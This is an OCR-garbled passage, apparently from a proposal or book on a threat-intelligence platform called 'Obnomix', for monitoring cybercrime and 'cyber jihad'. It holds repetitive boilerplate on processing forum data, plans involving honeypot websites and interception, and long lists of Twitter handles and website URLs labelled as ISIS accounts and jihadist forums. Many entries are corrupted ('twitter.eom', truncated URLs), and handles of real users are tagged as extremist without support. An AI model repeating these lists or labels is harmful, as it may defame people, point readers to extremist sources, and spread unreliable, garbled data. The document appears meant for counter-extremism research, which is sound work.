foundations for a successful data and intelligence-driven 
type of research based type of cybercrime and malicious- 

activity tracking activity to include but not limited to 
cybercrime community forum data and active social media 
mon¬ 
itoring and profiling capabilities. 

• forum topic 

the platform will be ultimately capable of processing a 
particular forum topic for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum message 

the platform will be ultimately capable of processing a 
particular forum message for the purpose of establishing the 



foundations for a successful intelligence gathering process 

• forum member 

the platform will be ultimately capable of processing a 
particular forum member for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum member message 

the platform will be ultimately capable of processing a 
particular forum member message for the purpose of 

establishing the foundations for a successful intelligence 
gathering process 

• forum message 

- the platform will be ultimately capable of processing a 
particular forum message for the purpose of establishing the 

foundations for a successful intelligence gathering process 

• forum message 

- the platform will be ultimately capable of processing a 
particular forum external message for the purpose of 

successfully establishing the foundations for a successful 
intelligence gathering process 

• forum time 

- the platform will be ultimately capable of processing a 
particular forum time for the purpose of establishing the 

foundations for a successful intelligence gathering process 
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• forum data 

the platform will be ultimately capable of processing data 
including date time message uri email ultimately establish¬ 
ing the foundations for a successful intelligence gathering 
process 

• forum URL 

the platform will be ultimately capable of processing a 
particular forum URL further establishing the foundation for 

the Obnomix platform further establishing the foundations 
for a successful intelligence gathering process 

• forum media 

the platform will be ultimately capable of processing forum 
media further establishing th foundations for the 

Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 

• forum email 

the platform will be ultimately capable of processing forum 
email further establishing the foundations for the 

Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 

• forum contact 

the platform will be ultimately capable of processing forum 
contact further establishing the foundations for the 



Obnomix platform further establishing the foundations for a 
successful intelligence gathering process 

Sample ISIS Social Media Twitter Accounts: 

• https://twitter.com/As_soumaly 

• https://twitter.com/wilayat _cairo56 

• https://twitter.com/ISmisMUJAHIDAH 

• https://twitter.com/islamdamasl980 40k 

• https://twitter.com/HA _alshami03 

• https://twitter.com/jundi71033868 

• https://twitter.com/nor92331 

• https://twitter.com/WmWmWm57 

• https://twitter.com/tytxzxxz 

• https://twitter.com/raisiiiiii 

• https://twitter.com/FIIIIII2015 
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• https://twitter.com/BrCdPrsnr 

• https://twitter.com/leembfs2017 

• https://twitter.com/Sheb84669751 

• https://twitter.com/GMCTNT _1979 

• https://twitter.com/i593162 





• https://twitter.com/bela _hudood 

• https://twitter.com/_u_r7yok 

• https://twitter.com/kalmat _haaq 

• https://twitter.com/meersbo2 

• https://twitter.com/iahmd61 

• https://twitter.com/TurMedia316 

• https://twitter.com/shamtu _33 

• https://twitter.com/hoecl5 

• https://twitter.com/ll41lll 

• https://twitter.com/AIJabarti45 

• https://twitter.com/abo _roqaia82 

• https://twitter.com/inmyheartisis 

• https://twitter.com/gurababizl551 

• https://twitter.com/jhkghjy 

• https://twitter.com/Hero Jsis _711 

• https://twitter.com/itc_hallo 

• https://twitter.com/TurMedia316 

• https://twitter.com/JUI _Lj 

• https://twitter.com/SomQaeda 

• https://twitter.com/TARLEE4 




• https://twitter.com/Muj _93 _Hed 

• https://twitter.com/dieebkhel 

• https://twitter.com/HJdjdu 

• https://twitter.com/anwartab 

• https://twitter.com/SYRIA_GID 

• https://twitter.com/Xkb038 
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• https://twitter.com/MKoshur2 

• https://twitter.com/abutalut8 

• https://twitter.com/AEJKhalil 

• https://twitter.com/abu2legend 

• https://twitter.com/Gqeflfwlemqpdmf 

• https://twitter.com/alhlby027 

• https://twitter.com/SuehwShehe 

• https://twitter.com/sdsdsd325245 

• https://twitter.com/gffgglll 

• https://twitter.com/ISIS _1979GMC 

• https://twitter.com/dola24687 

• https://twitter.com/timbosulli 

• https://twitter.com/f75da586675f456 




• https://twitter.com/khilafahinfos 

• https://twitter.com/allbasra 

• https://twitter.com/Muhaajirah _ 

• https://twitter.com/abufalahalhincl4 

• https://twitter.com/Saeecl _alHalabiO 

• https://twitter.com/iislamicl2 

• https://twitter.com/TaWhEeD_0 

• https://twitter.com/avuOmar _shams 

• https://twitter.com/abouanstunisi 

• https://twitter.com/homsiia 

• https://twitter.eom/4_7m0o0cl 

• https://twitter.com/ Djoiyriajw 

• https://twitter.com/96176629289 

• https://twitter.com/killer _cail99 

• https://twitter.com/mfawasl 

• https://twitter.com/ohatab8 

• https://twitter.com/Ultrasmusliml 

• https://twitter.com/A05462492 
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• https://twitter.com/azve76 




• https://twitter.com/ClemStal Di m 

• https://twitter.com/mahmood 

• https://twitter.com/aqill41 

• https://twitter.com/iahmd61 

• https://twitter.com/azve76 

• https://twitter.com/PicotNo 

• https://twitter.eom/h _a _e 23 

• https://twitter.com/goo_ias 

• https://twitter.com/_irl_toby6 

• https://twitter.com/samhalo 

• https://twitter.com/samhalo 

• https://twitter.com/rdcongo _news 

• https://twitter.com/hytegetydyte 

• https://twitter.com/f75da586675f456 

• https://twitter.com/Muj _93 _Hed 

• https://twitter.com/abohashmily 

• https://twitter.com/Alhareth_2 

• https://twitter.com/wfsfsd 

• https://twitter.com/FoopSeven 

• https://twitter.com/azve77 




• https://twitter.com/Ali_G303L 

• https://twitter.eom/R9O7GupXDM0b0pd 

• https://twitter.com/georgebintol 

• https://twitter.com/nightwalker _74he 

• https://twitter.com/ahmadvasvv565 

• https://twitter.com/Ansar _AIShariaO 

• https://twitter.com/Alsloli _dog/media 

• https://twitter.com/inmyheartisis 

• https://twitter.com/om _elbarael 

• https://twitter.com/saadsaudi2014 
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• https://twitter.com/timotim91217281 

• https://twitter.com/ii _o _01ru 

• https://twitter.com/aljanady75 

• https://twitter.eom/KatzOUmAIBaraaO 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/Misk_2_a 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/Omisshaq 




• https://twitter.com/qatada _93 

• https://twitter.com/ls_zarkiue 

• https://twitter.com/Ali _G303L 

• https://twitter.com/fgh959 

• https://twitter.eom/sdg42303540 

• https://twitter.com/alptter_ 

• https://twitter.com/umaisha55 

• https://twitter.com/algwsd2233 

• https://twitter.com/dfgndf2 

• https://twitter.com/leembfs2017 

• https://twitter.com/wearekillkofar 

• https://twitter.com/Om_islam47 

• https://twitter.com/islamic Jso 

• https://twitter.com/ _a _a _20 

• https://twitter.com/truth _ee 

• https://twitter.com/Fahad _Buhend 

• https://twitter.com/lmj_hallo 

• https://twitter.eom/er_er_500 

• https://twitter.com/86Roben 

• https://twitter.com/DsdsdsfSddsd 




• https://twitter.com/abu _a _88 

• https://twitter.com/sadkingp20 
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• https://twitter.com/noor_sban6 

• https://twitter.com/is5 _is5 

• https://twitter.com/JUI _LJ 

• https://twitter.com/qatada _9 

• https://twitter.com/abo_al _zubair 

• https://twitter.com/0thmanl4 _C4 

• https://twitter.com/nedalo9314 

• https://twitter.com/SamalQ__90 

• https://twitter.com/Mar44ma 

• https://twitter.com/Manaln9 

• https://twitter.com/phupeuea 

• https://twitter.com/raisiiiiii 

• https://twitter.com/aljanady75/ 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/Misk_2_a 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 





• https://twitter.com/198 _mazen 

• https://twitter.com/CavalierDuSham 

• https://twitter.com/SinaiTor 

• https://twitter.com/NaserlS8 

• https://twitter.com/oumme _aymenlO 

• https://twitter.com/gaznaya 

• https://twitter.com/un _serviteur 

• https://twitter.com/Teki ndebeyvi n 

• https://twitter.com/ _DaviclThomson 

• https://twitter.com/VegetaMoustache 

• https://twitter.com/Millatlbrahiml 

• https://twitter.com/Hayati _LiLLah _ 

• https://twitter.com/Alittl245 

• https://twitter.com/salehalawlqil 
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• https://twitter.com/SimNasr 

• https://twitter.com/xonraqqa 

• https://twitter.com/aoclaaocla4 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/anwartab 




• https://twitter.com/waswa0127 

• https://twitter.com/ali523480 

• https://twitter.com/Rhbclbcll 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/AIJabarti46 

• https://twitter.com/lslamiyaKurcli 

• https://twitter.com/zayanepower 

• https://twitter.com/WalaAnclBara 

• https://twitter.com/SFKIIIHHF __o033 

• https://twitter.com/AAclhimlO 

• https://twitter.com/MhclSayf 

• https://twitter.com/abo_67 _omar 

• https://twitter.com/DawlaBrulFrance 

• https://twitter.com/strange76292811 

• https://twitter.com/Vbnlsrt 

• https://twitter.com/IS_IS021 

• https://twitter.com/IS_IS022 

• https://twitter.com/AbclAllahGaza 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/iislamicl2 




• https://twitter.com/ajmurgent 

• https://twitter.com/baqiya79R 

• https://twitter.com/abujamalucleen02 

• https://twitter.com/ibn _abcliqany 

• https://twitter.eom/killercat600 

• https://twitter.com/MisciFromTheD 
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• https://twitter.com/3aam_AI _Diri 

• https://twitter.com/mnhtye 

• https://twitter.com/block_151 

• https://twitter.com/Hijazi _9111 

• https://twitter.com/ibn _clyala93 

• https://twitter.com/jxcjcjl 

• https://twitter.com/mosalmal991 

• https://twitter.com/rfvb7 

• https://twitter.eom/alaserlOO 

• https://twitter.eom/ascl4000hcl 

• https://twitter.com/AbclAllahGaza 

• https://twitter.com/MhclSayf 

• https://twitter.com/aqaqlqa 




• https://twitter.com/mhuncl231 

• https://twitter.com/azclyisis55 

• https://twitter.com/Baghclacl9191 

• https://twitter.com/74ghl 

• https://twitter.com/nnbb77881 

• https://twitter.eom/a _t _ _29 _ _7a 

• https://twitter.com/Kh_nsal43 

• https://twitter.com/theykillmybro 

• https://twitter.com/210Bircly 

• https://twitter.com/claish90 

• https://twitter.eom/A_A_c 

• https://twitter.com/soman611 

• https://twitter.com/qwerwoow 

• https://twitter.com/fojraqqa 

• https://twitter.com/saegr2 

• https://twitter.com/ezzislamm 




• https://twitter.com/ach3ari _maliki 

• https://twitter.com/Ansar5433 
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• https://twitter.com/waja__l 

• https://twitter.com/lslamic _3344 

• https://twitter.com/0j7jl (doe 

• https://twitter.com/zeses2 

• https://twitter.com/abu _a _89 

• https://twitter.com/medad_medl 

• https://twitter.com/block_151 

• https://twitter.com/Alkurdil995 

• https://twitter.com/haydra2233 

• https://twitter.com/Asirat _Tunisial 

• https://twitter.com/Rouba56 

• https://twitter.com/KA_ll7 

• https://twitter.com/bwwwg 

• https://twitter.com/aljabri354 

• https://twitter.com/msaks241 

• https://twitter.com/wffffll089 




• https://twitter.com/Djjjdjd4 

• https://twitter.com/parislNHELL 

• https://twitter.com/llll32llll 

• https://twitter.com/Daaeem51 

• https://twitter.com/malekaty891 

• https://twitter.com/mouwa7ed _03 

• https://twitter.eom/sunnahthlOOO 

• https://twitter.com/R_nxxt_l 

• https://twitter.com/qq_qq_79 

• https://twitter.com/rkrk4m25 

• https://twitter.com/OT_lll57 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/adgrl9 

• https://twitter.com/Njd __zz77zz 

• https://twitter.com/Hhgff26176827 
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• https://twitter.eom/OOUItraOO 

• https://twitter.com/rkrk4m25 

• https://twitter.com/rkrk4m26, 

• https://twitter.com/rkrk4m27 




• https://twitter.com/rkrk4m28 

• https://twitter.com/rkrk4m29 

• https://twitter.com/rkrk4m30 

• https://twitter.com/rkrk4m31 

• https://twitter.com/rkrk4m32 

• https://twitter.com/kaj__s 

• https://twitter.com/ABu _AIAylnaa 

• https://twitter.com/ABO _SLEMAN _9 

• https://twitter.com/cl _mf33 

• https://twitter.com/Turbo _zahicl 

• https://twitter.com/ww_cvf 

• https://twitter.com/IITIIillTII 

• https://twitter.com/CF _G66 

• https://twitter.com/abujuuacl 

• https://twitter.com/isis_2277 

• https://twitter.com/Ascll5Wreg 

• https://twitter.com/abcclfghjkll2 

• https://twitter.com/71AprVISHV18VIP 

• https://twitter.com/Ha23ra3F987 

• https://twitter.com/UiU _o _UiU 




• https://twitter.com/isuwh 

• https://twitter.com/lll__Heart 

• https://twitter.com/Sabaa760 

• https://twitter.com/zajell8 

• https://twitter.com/clockwise75 

• https://twitter.com/jxcjcjl 

• https://twitter.com/gjclfoi221qw 
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• https://twitter.com/smjh2154 

• https://twitter.com/Aymanjrjr2 

• https://twitter.com/khatabb66 

• https://twitter.com/sor_hall 

• https://twitter.com/isis_1188 

• https://twitter.com/allmah89 

• https://twitter.com/j3x_w8p 
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• https://twitter.com/iplee4 

• https://twitter.com/isis_3344 

• https://twitter.com/nor964432 

• https://twitter.com/Turbo_113 

• https://twitter.com/ivfkfj2 

• https://twitter.com/Clh9ML 

• https://twitter.com/157aboismail 

• https://twitter.com/cmdmmxl 

• https://twitter.com/RxdctfvDtfhj 

• https://twitter.eom/zhranylOO 
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• https://twitter.com/kalldd345 

• https://twitter.com/invasion44 

• https://twitter.com/26anneza3 

• https://twitter.com/Gareeeb45 

• https://twitter.com/baqya520 

• https://twitter.com/fbdfberberber 

• https://twitter.com/treraqqa 

• https://twitter.com/talwtalbghdadyl 

• https://twitter.eom/M _m _m _m _2000 

• https://twitter.com/alsloulistupid 

• https://twitter.com/Aleeeiiii4444 

• https://twitter.com/MatarMurad 

• https://twitter.com/GMC_IS 

• https://twitter.com/Diteslavrit4 

• https://twitter.com/abou _walaal2 

• https://twitter.com/LLAA554 

• https://twitter.com/safeallah425 

• https://twitter.com/kinght78ag 

• https://twitter.com/Bdjdjdl6 

• https://twitter.com/lk_32 _state 




• https://twitter.com/hjfkdsll 

• https://twitter.com/Om _0said _63 

• https://twitter.com/kurdish22 _22 

• https://twitter.com/AzdiSayil 

• https://twitter.com/ahmedx360xl8 

• https://twitter.com/HuChuin _63 

• https://twitter.com/parisonourfire 

• https://twitter.com/20Trewq 

• https://twitter.com/gkgjfufjc 

• https://twitter.com/humaninnocence 

• https://twitter.com/monaserl56 
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• https://twitter.com/muriidil2 

• https://twitter.com/poompaiii 

• https://twitter.com/muslim_13_ 

• https://twitter.com/ahmadkhloofll5 

• https://twitter.com/Masl24an 

• https://twitter.com/ahmedmahmoudil2 

• https://twitter.com/dfghujuiytrr 

• https://twitter.com/mejedklm 




• https://twitter.com/f73071755 

• https://twitter.com/rkrk4m26 

• https://twitter.com/clyalla72 

• https://twitter.com/sa7awetbuslim04 

• https://twitter.com/TP57iQ3ICAGgKzV 

• https://twitter.com/mohammeclsz6 

• https://twitter.com/1993Agmacll993 

• https://twitter.com/Bbsswwnn 

• https://twitter.com/almnasron4 

• https://twitter.com/bar_bell 

• https://twitter.com/ManguAilon55 

• https://twitter.com/moclie_50 

• https://twitter.com/Njcl_qt78is 

• https://twitter.com/Gehaaaclll22 

• https://twitter.com/blacli _00alaslam 

• https://twitter.com/fallujhal 

• https://twitter.com/AboFareecllO 

• https://twitter.com/manerlancl 

• https://twitter.com/abo _a _94 

• https://twitter.com/3Abouwalicl 




• https://twitter.com/bakreebeeko _5 

• https://twitter.com/3lill87 

• https://twitter.com/Alnablsy97 
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• https://twitter.com/G6A77 

• https://twitter.com/The0bserver91 

• https://twitter.com/6cccg2 

• https://twitter.com/ISIS_HER01 

• https://twitter.com/ZZzBXqHOymuBANK 

• https://twitter.com/teamsystemclz 

• https://twitter.com/vbhgxclfc 

• https://twitter.com/bhCotn 

• https://twitter.com/maktaba _1 

• https://twitter.com/osama _claml 

• https://twitter.com/fata _almosel 

• https://twitter.com/xxmm4455777 

• https://twitter.com/abujalaall 

• https://twitter.com/Waseemalsaucli 

• https://twitter.com/Khlifa27al2 

• https://twitter.com/AbiclaGina 




• https://twitter.com/Ansar _DawlalO 

• https://twitter.com/yesteyesic4 

• https://twitter.com/lieffejongen 

• https://twitter.com/MohammeclAtta22 

• https://twitter.com/Ticaal90 

• https://twitter.com/AliAclenalSomali 

• https://twitter.com/ns45678 

• https://twitter.com/AbouShahacleh 

• https://twitter.com/jihaclil0744139 

• https://twitter.com/abohamzaalturki 

• https://twitter.com/JoniManm 

• https://twitter.com/omarl985741 

• https://twitter.eom/see00012 

• https://twitter.com/almuhajerBackup 

• https://twitter.com/saclking23 
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• https://twitter.com/qwttplly 

• https://twitter.com/k42isisa 

• https://twitter.com/clhxhsvcl2 

• https://twitter.com/77nb_ 




• https://twitter.com/dawlajokers 

• https://twitter.eom/monaser0017 

• https://twitter.com/dawlawialg671 

• https://twitter.com/fahadeyad62 

• https://twitter.com/btr333btr4 

• https://twitter.com/vrjevvel 

• https://twitter.com/Hhdhdgl 

• https://twitter.com/GF98LKI 

• https://twitter.com/dola24687 

• https://twitter.com/Talal _Q30 

• https://twitter.com/muslimmouwahed8 

• https://twitter.com/8itismesalman 

• https://twitter.com/kubuiman03v 

• https://twitter.com/jihadiuser58 

• https://twitter.com/PARRIS_951 

• https://twitter.com/isis_1144 

• https://twitter.com/SyariahlSlight8 

• https://twitter.com/meek _don 

• https://twitter.com/yotorg 

• https://twitter.com/facebookaccoun2 




• https://twitter.com/nseem066 

• https://twitter.com/AnsarAd98 

• https://twitter.com/ieshabaqea 

• https://twitter.com/batist550 

• https://twitter.com/aassddffa833 

• https://twitter.com/madridi4good 

• https://twitter.com/nor92331 
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• https://twitter.com/lEINusral 

• https://twitter.eom/j Jj Jjj _5577 

• https://twitter.com/strange566 

• https://twitter.com/gp2126 

• https://twitter.com/pp62068813 

• https://twitter.com/_N__ 

• https://twitter.com/Uddjdnl 

• https://twitter.com/kathebwll 

• https://twitter.eom/bbgg75157900 

• https://twitter.com/Ramal5202 

• https://twitter.com/ J _l _T _E _M _ 

• https://twitter.com/mohamed _zainab4 






• https://twitter.com/ChicbnmAbn 

• https://twitter.com/Tr8 _K0 

• https://twitter.com/eng__sr 

• https://twitter.com/gjjkjtogfffclr 

• https://twitter.com/Om_khatabb 

• https://twitter.com/ubj _k 

• https://twitter.com/KhilafahDawah5 

• https://twitter.com/AbuDharlslancli7 

• https://twitter.com/ixcncnl 

• https://twitter.com/anaelclora30 

• https://twitter.com/mazenhapne 

• https://twitter.com/qwtpllry 

• https://twitter.com/Dabiiq7 

• https://twitter.com/A05462492 

• https://twitter.com/Hmocle5556Www 

• https://twitter.com/3MlagD01 

• https://twitter.com/meclitato 

• https://twitter.com/ukhtiaishal 

• https://twitter.com/abccll23456789a7 
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• https://twitter.com/abou _amina37 

• https://twitter.com/AmonMame 

• https://twitter.eom/0o8000o8001 

• https://twitter.com/Abu _Bin _Fartin 

• https://twitter.com/marscls98zahrany 

• https://twitter.com/_ihsen _086 _ 

• https://twitter.com/33Khilafa 

• https://twitter.com/gajhfjfcl 

• https://twitter.com/0baycl6Wevrw 

• https://twitter.eom/0o00ooq 

• https://twitter.com/e30isisa 

• https://twitter.com/41invasion 

• https://twitter.com/OplS75 

• https://twitter.com/K_H_034 

• https://twitter.com/h90 _6 

• https://twitter.com/know_paris 

• https://twitter.com/saeul7 

• https://twitter.com/anjemchouclary 

• https://twitter.eom/tnt502tnt502 

• https://twitter.com/AbuFullaan9th 




• https://twitter.com/gmailco69426226 

• https://twitter.com/0wais_51 

• https://twitter.eom/mohamecl20607 

• https://twitter.com/mecl _syr_ira91 

• https://twitter.com/muslim _libi 

• https://twitter.com/muahiecl _7 

• https://twitter.eom/qqeqq00111 

• https://twitter.com/ahmecll4377 

• https://twitter.com/aabuyosif 

• https://twitter.com/vip444662 

• https://twitter.com/saeul7 
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• https://twitter.eom/clgsclg00712420 

• https://twitter.com/kabugezo 

• https://twitter.com/AbulslamlS1990 

• https://twitter.com/mafel _65 

• https://twitter.com/AbuHafsaBritani 

• https://twitter.com/Ahmaclkhalf2012 

• https://twitter.com/YourOwnBroll6 

• https://twitter.eom/ReportersOOO 




• https://twitter.com/TurMedia318/ 

• https://twitter.com/GermanyUnderAtk 

• https://twitter.com/WakeUp_MV 

• https://twitter.com/saeul7 

• https://twitter.com/Bushrall JS 

• https://twitter.com/TurMedia318 

• https://twitter.com/jabalybaraa 

• https://twitter.com/s_2017_ 

• https://twitter.com/frm450 

• https://twitter.com/gogoaag82 

• https://twitter.eom/xxx__800 

• https://twitter.com/pe0jnv39mvnf 

• https://twitter.com/lslamArmy01 

• https://twitter.eom/g8670062 _8 

• https://twitter.com/yyf_hallo 

• https://twitter.com/elAFX9kbARBByHv 

• https://twitter.com/lba559721 

• https://twitter.com/del _elremahl 

• https://twitter.com/isisom61 

• https://twitter.com/ldififkkl 




• https://twitter.com/makdicil970 

• https://twitter.com/mahsudll7 

• https://twitter.eom/K _A _S _E _R _5 
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• https://twitter.com/lmaqdese 

• https://twitter.com/nour_umm 

• https://twitter.com/5aq5qDGpNsr4IDU 

• https://twitter.com/AbdMouwahid 

• https://twitter.com/gaza9310 

• https://twitter.com/Jfdlbk 

• https://twitter.com/Elkhelafa _Now 

• https://twitter.com/jazaerl2254477 

• https://twitter.com/lssamSayari 

• https://twitter.com/Abo_mhdi29 

• https://twitter.com/moedker01 

• https://twitter.eom/hafeedl001 

• https://twitter.com/Yamani _5 

• https://twitter.com/alsumoudl7 

• https://twitter.eom/nbnl000 

• https://twitter.com/khilafahinfos 





• https://twitter.com/teagouchl 

• https://twitter.com/aaallaaallaaa __ 

• https://twitter.com/onclayiwillkilly 

• https://twitter.com/DjibrilParisi 

• https://twitter.com/aawwss_22 

• https://twitter.com/Dolawiyah Jo6 

• https://twitter.com/gfcl6064 

• https://twitter.com/ansaarl32 

• https://twitter.com/clrwaleecl5253 

• https://twitter.com/ajnacl55 

• https://twitter.com/inbes3 

• https://twitter.com/asauclicowclonkey 

• https://twitter.com/zxzx321zxzx 

• https://twitter.com/UmmAbclallah89 

• https://twitter.com/arabhty 
247 

• https://twitter.com/Asirat _hraminl9 

• https://twitter.com/EhliSunneti3 

• https://twitter.com/salilbnim 

• https://twitter.com/Saifjazraawi 




• https://twitter.com/ablo3zaml2 

• https://twitter.eom/frost0023 

• https://twitter.com/uiopup 

• https://twitter.com/Kassar_lam 

• https://twitter.com/gmccccclO 

• https://twitter.com/clrherhclfbclrhclhs 

• https://twitter.com/kinght78ag 

• https://twitter.com/JUI _LJ 

• https://twitter.com/snipern433 

• https://twitter.com/Ffhfbfbl 

• https://twitter.com/Almohajer_103 

• https://twitter.com/oummoucljahicl 

• https://twitter.com/ahmaclsaicl91 

Detailed Project Funding Stages Information 

The initial stage of the project will consist of selective and 
timely purchase of all the necessary appliances in¬ 
cluding the timely localization and successful acquisition of 
fake Web sites honeypot solutions including the active 

acquisition of network assets for the purpose of successfully 
honeypot solution placement. 

• The main objective of the initial phase would be to acquire 
all the necessary equipment for the purpose of 




setting up the foundations for the Obmonix platform. The 
equipment will be acquired in a timely fashion largely 

relying on a selected set of proprietary industry leading set 
of contacts. 

• The main objective of the next phrase would be to ensure 
that the equipment is placed in a secure location 

and is properly maintained for the purpose of ensuring that 
the operator is capable of operating the Obmonix 

platform in a secure way. 

• The main objective of the next phase would be to establish 
the foundations of the world's largest data set of in¬ 
telligence data for the purpose of ensuring that the Obmonix 
platform is capable of processing and intercepting 

the necessary data. 

• The main objective of the next phase would be to acquire 
the necessary proprietary service based solutions 

that would empower the operator with the necessary tools to 
process and intercept data. 
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• The main objective of the next phase would be to process 
and intercept the world's largest data set of cybercrime and 
cyber jihad data. 

Sample Cyber Jihad Forums: 

• http://rion2005.100free.com 



http://2s2s.com 

http://abo-ali.com 

http://Aboalqaqa.blogspot.com 

http://aboaumir.moclawanati.com 

http://abomoath.ahiabiog.com 

http://abomosab-s.110mb.com 

http://abu-hacli.net 

http://abu-qatacla.com 

http://abubaraa.co.ui< 

http://abujibriei.com 

http://aei<h iaas.com 

http://aei<hiaas.net 

http://ahiu-tawheecl.com 

http://ai3aren.com/vb/inclex.php 

http://ai3wcla.com/vb/inclex.php 

http://ai-amanh.net 

http://ai-ansar.net 

http://ai-boraq.info 

http://ai-boraq.org 

http://ai-busyrol.info 



http://a 

http://a 

http://a 

http://a 

http://a 

http://a 
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http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 

http://a 


-busyro.info 

-ekhlaas.net 

-ekhlaas.net/forum 

-ekhlaas.org 

-faloja.com 

-faloja.info/vb/index.php 


-farooq.net 

-jahafal.com/vb 


-kafkaz.com 


-mustaqbal.net 


-nour.net 


-ommh.net 


-qimmah.net 

-rashedeen.info 


-tamkeen.com 


-yemen.org 

ahed.org 

amer.biz/ameer/home.html 

anbar.topgoo.net 




• http://alanssar.net 

• http://alaseb.com 

• http://albasrah.net/index.php 

• http://albawaba.com 

• http://albayan.co.uk 

• http://albayanislamac.com 

• http://aibetaqa.com 

• http://aiboraq.info 

• http://Aiboraq.info/forum 

• http://aiboraqforum.info 

• http://aibtar.ltaik.net/index.htm 

• http://aibusyro.info 

• http://aibuxoriy.com 

• http://aiekhiaas.com 

• http://aiekhiaas.info 

• http://aiekhiaas.net 

• http://aiekhiaas.org 

• http://aiemaral.org 
250 

• http://aiemarah.org 




• http://alfajrtaqni.net 

• http://alfetn.com 

• http://alfetn.com 

• http://alficla.jeeran.com 

• http://alficlaa.biz 

• http://alficlaa.info/vb 

• http://alficlaa.org/vb 

• http://alforqan.ingoo.us 

• http://Alforqan.ingoo.us 

• http://alfurq4n.org 

• http://algyshalmnsur.r8.org 

• http://AIHanein.com 

• http://AIHesbah.net 

• http://AIHesbah.org 

• http://alifati.worclpress.com 

• http://alintiqacl.com 

• http://aljazeeratalk.net/forum/ 

• http://aljazeeratalk.net/portal 

• http://alkhelafa.eu 

• http://allah4ever.hi5.com 




• http://almaqdese.net 

• http://almaqreze.net 

• http://almaqreze.net/ar 

• http://almedad.com/vb 

• http://almnbr.net/vb 

• http://almob2.com 

• http://almobshrat.net 

• http://almokhtsar.com 

• http://almqdes.net 

• http://almubarakradio.com 
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• http://Alnakshabandia-army.com 

• http://ainakshabandia-army.org/home 

• http://Aineda.com 

• http://Ainour.hyperphp.com 

• http://ainour.hyperphp.com/vb 

• http://Ainusra.net 

• http://ainusrra.net 

• http://aiokab.com 

• http://aiokab.com/forums/iofiversion 




• http://alqassam.ps 

• http://alqoqaz.net 

• http://alquds.co.uk 

• http://alrafdean.org 

• http://alraiah.net 

• http://Alsaha.com 

• http://alshahid.org 

• http://aisomod-iea.info 

• http://aisomod.com 

• http://aisunnah.info 

• http://Aisunnah.info 

• http://aitabetoun.110mb.com 

• http://aitarefe.com 

• http://aitarefe.com is 

• http://aitawbah.net/vb 

• http://aitaybeh.net 

• http://aiweya.com 

• http://an-najah.net 

• http://anashid.ru 

• http://Anbaar.net 




• http://anjemchoudary.co.uk 

• http://ansal.info 
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http://ansaaar.com 

http://ansarl.info 

http://ansarll.org 

http://ansar-alhaqq.net 

http://ansar-jihad.net 

http://ansar.tv 

http://Ansarnet.ws 

http://ansharulislam.com 

http://anti-majos.com 

http://antiliberalnews.com 

http://antydetroidmichigan.blog.onet.pl 

http://aqeeda2008.maktoobblog.com 

http://aqlislamiccenter.com 

http://arrahmah.com 

http://asadl01.jeeran.com 

http://asaeb.net 

http://asaebweb.com 




• http://asd813.maktoobblog.com 

• http://atahadii.com/vb 

• http://Azzam.com 

• http://azzammedia.com 

• http://azzammedia.net 

• http://bab-ul-islam.net 

• http://baghdadsniper.net 

• http://bintjbeil.com 

• http://bumisyam.com 

• http://cageprisoners.com 

• http://cageuk.org 

• http://chechensinsyria.com 

• http://ClearGuidance.com 

• http://clearinghous.infovlad.net 
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• http://cyberkov.com 

• http://czeczenia.blog.onet.pl 

• http://d-sunnah.net 

• http://dakwahmedia.net 

• http://darelhadi.com 




• http://Darelhadi.com 

• http://daruhilafe.com 

• http://darultavhid.com 

• http://daulahislamiyah.net 

• http://daulahislamiyyah.com 

• http://dawaalhaq.com 

• http://dawatehaq.net 

• http://dawla-is.cf 

• http://dd-sunnah.net/forum/index.php 

• http://dhiqar.net 

• http://dinhaqq.info 

• http://doguturkistanbulteni.com 

• http://dr-algzouli.com 

• http://dr-mahmoud.com 

• http://drbj.net 

• http://duniaterkini.com 

• http://dwl-is.appspot.com 

• http://dyoul991.maktoobblog.com 

• http://e-kl-s.info 

• http://e-kl-s.net 




• http://egysite.com/al2nsar 

• http://ek-ls.org 

• http://ekhlaas.biz 

• http://ekhlaas.cc 

• http://Ekhlaas.cc 

• http://ekhlaas.com 
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• http://ekhlaas.info 

• http://ekhlaas.net 

• http://ekhlaas.org 

• http://ekhlaas.ws 

• http://el-tewhicl.com 

• http://elclorar.com 

• http://elmanara.org 

• http://Elshouraa.ws/vb 

• http://eltwhecl.110mb.com 

• http://eltwhecl.110mb.com/homepage.htm 

• http://enfalmeclya.com 

• http://eramuslim.com 

• http://eraqeiclawlh.maktoobblog.com 




• http://f2008h.maktoobblog.com 

• http://falestiny.net 

• http://falloja.blogspot.com 

• http://farouqomar.net 

• http://fatehforums.com 

• http://ficlaal.net/vb 

• http://fisyria.info 

• http://forum.hawaaworlcl.com 

• http://forum.saraya.ps 

• http://forums.ikhwan.net/t 

• http://forums.naseej.com 

• http://fpi.or.icl 

• http://fursan-al-iraq.over-blog.com 

• http://g-elshmal.com/vb/inclex.php 

• http://generalvekalat.org 

• http://ghaaly.com 

• http://ghaliboun.net 

• http://gimfmeclia.com/tech 
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• http://gulf-up.com 




• http://gurmad.info 

• http://h-alali.net 

• http://halabnews.com 

• http://halifat.info 

• http://halifat.org 

• http://hamas.ps 

• http://hamasaliraq.com 

• http://hamasiraq.org 

• http://hanein.info 

• http://hanein.info/ 

• http://hanein.info/vb 

• http://hanein.info/vb/forum.php 

• http://harb-net.com/vb 

• http://harunyahya.com 

• http://healthl.maktoobblog.com 

• http://hewar.khayma.com 

• http://heyetnet.org 

• http://hidayatullah.com 

• http://hizb-afghanistan.com 

• http://hizb-america.org 




• http://hizb-australia.org 

• http://hizb-eastafrica.com 

• http://hizb-pakistan.com 

• http://hizb-russia.info 

• http://hizb-turkiston.net 

• http://hizb-turkiye.org 

• http://hizb-ut-tahrir-almaghreb.info 

• http://hizb-ut-tahrir.clk 

